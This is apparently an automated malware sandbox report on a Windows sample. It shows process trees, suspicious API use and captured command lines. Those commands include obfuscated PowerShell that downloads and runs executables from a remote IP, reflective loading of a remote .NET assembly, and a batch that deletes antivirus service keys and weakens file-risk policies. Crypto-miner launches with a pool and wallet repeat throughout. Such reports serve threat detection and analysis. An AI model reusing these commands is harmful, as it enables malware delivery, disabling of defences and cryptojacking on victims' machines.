Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exepid process 3928 d4537efd24d9b886648bd32b6ce4da99.exe 3928 d4537efd24d9b886648bd32b6ce4da99.exe 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2996 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exepid process 3928 d4537efd24d9b886648bd32b6ce4da99.exe 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 2996 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
28A9.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeDebugPrivilege 2248 28A9.exe Token: SeRestorePrivilege 3916 WerFault.exe Token: SeBackupPrivilege 3916 WerFault.exe Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeShutdownPrivilege 2996 Token: SeCreatePagefilePrivilege 2996 Token: SeDebugPrivilege 3916 WerFault.exe Token: SeDebugPrivilege 720 WerFault.exe Token: SeDebugPrivilege 3836 WerFault.exe Token: SeDebugPrivilege 2736 WerFault.exe Token: SeDebugPrivilege 1232 WerFault.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
1EE4.tmppid process 2996 2996 2064 1EE4.tmp -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
pid process 2996 2996 2996 2996 2996 2996 2996 2996 2996 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
1974.exepid process 188 1974.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2996 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exe1EE4.exe1EE4.tmp1EE4.exeWerFault.exe2CF0.exeRuntimebroker.exedescription pid process target process PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 628 wrote to memory of 3928 628 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 2996 wrote to memory of 188 2996 1974.exe PID 2996 wrote to memory of 188 2996 1974.exe PID 2996 wrote to memory of 188 2996 1974.exe PID 2996 wrote to memory of 1976 2996 1EE4.exe PID 2996 wrote to memory of 1976 2996 1EE4.exe PID 2996 wrote to memory of 1976 2996 1EE4.exe PID 1976 wrote to memory of 2300 1976 1EE4.exe 1EE4.tmp PID 1976 wrote to memory of 2300 1976 1EE4.exe 1EE4.tmp PID 1976 wrote to memory of 2300 1976 1EE4.exe 1EE4.tmp PID 2300 wrote to memory of 1164 2300 1EE4.tmp 1EE4.exe PID 2300 wrote to memory of 1164 2300 1EE4.tmp 1EE4.exe PID 2300 wrote to memory of 1164 2300 1EE4.tmp 1EE4.exe PID 1164 wrote to memory of 2064 1164 1EE4.exe 1EE4.tmp PID 1164 wrote to memory of 2064 1164 1EE4.exe 1EE4.tmp PID 1164 wrote to memory of 2064 1164 1EE4.exe 1EE4.tmp PID 2996 wrote to memory of 2248 2996 28A9.exe PID 2996 wrote to memory of 2248 2996 28A9.exe PID 2996 wrote to memory of 2248 2996 28A9.exe PID 2996 wrote to memory of 4036 2996 2CF0.exe PID 2996 wrote to memory of 4036 2996 2CF0.exe PID 2996 wrote to memory of 4036 2996 2CF0.exe PID 2996 wrote to memory of 4040 2996 2FFE.exe PID 2996 wrote to memory of 4040 2996 2FFE.exe PID 2996 wrote to memory of 4040 2996 2FFE.exe PID 2064 wrote to memory of 2836 2064 WerFault.exe fsucenter.exe PID 2064 wrote to memory of 2836 2064 WerFault.exe fsucenter.exe PID 2064 wrote to memory of 2836 2064 WerFault.exe fsucenter.exe PID 2996 wrote to memory of 2224 2996 4675.exe PID 2996 wrote to memory of 2224 2996 4675.exe PID 2996 wrote to memory of 2224 2996 4675.exe PID 4036 wrote to memory of 2888 4036 2CF0.exe Runtimebroker.exe PID 4036 wrote to memory of 2888 4036 2CF0.exe Runtimebroker.exe PID 4036 wrote to memory of 2888 4036 2CF0.exe Runtimebroker.exe PID 2996 wrote to memory of 1344 2996 4ADB.exe PID 2996 wrote to memory of 1344 2996 4ADB.exe PID 2996 wrote to memory of 1344 2996 4ADB.exe PID 2996 wrote to memory of 2728 2996 4FCE.exe PID 2996 wrote to memory of 2728 2996 4FCE.exe PID 2996 wrote to memory of 2728 2996 4FCE.exe PID 2996 wrote to memory of 2840 2996 explorer.exe PID 2996 wrote to memory of 2840 2996 explorer.exe PID 2996 wrote to memory of 2840 2996 explorer.exe PID 2996 wrote to memory of 2840 2996 explorer.exe PID 2996 wrote to memory of 860 2996 powershell.exe PID 2996 wrote to memory of 860 2996 powershell.exe PID 2996 wrote to memory of 860 2996 powershell.exe PID 2996 wrote to memory of 3008 2996 explorer.exe PID 2996 wrote to memory of 3008 2996 explorer.exe PID 2996 wrote to memory of 3008 2996 explorer.exe PID 2996 wrote to memory of 3008 2996 explorer.exe PID 2888 wrote to memory of 860 2888 Runtimebroker.exe powershell.exe PID 2888 wrote to memory of 860 2888 Runtimebroker.exe powershell.exe PID 2888 wrote to memory of 860 2888 Runtimebroker.exe powershell.exe PID 2996 wrote to memory of 3992 2996 explorer.exe PID 2996 wrote to memory of 3992 2996 explorer.exe PID 2996 wrote to memory of 3992 2996 explorer.exe PID 2996 wrote to memory of 2860 2996 explorer.exe PID 2996 wrote to memory of 2860 2996 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1974.exeC:\Users\Admin\AppData\Local\Temp\1974.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exeC:\Users\Admin\AppData\Local\Temp\1EE4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp"C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp" /SL5="$501D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exe"C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp"C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp" /SL5="$601D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\28A9.exeC:\Users\Admin\AppData\Local\Temp\28A9.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2CF0.exeC:\Users\Admin\AppData\Local\Temp\2CF0.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 8562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 9122⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 8402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 8282⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 9482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 9722⤵
- Program crash
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 7323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 7763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 9843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 10443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 11763⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d 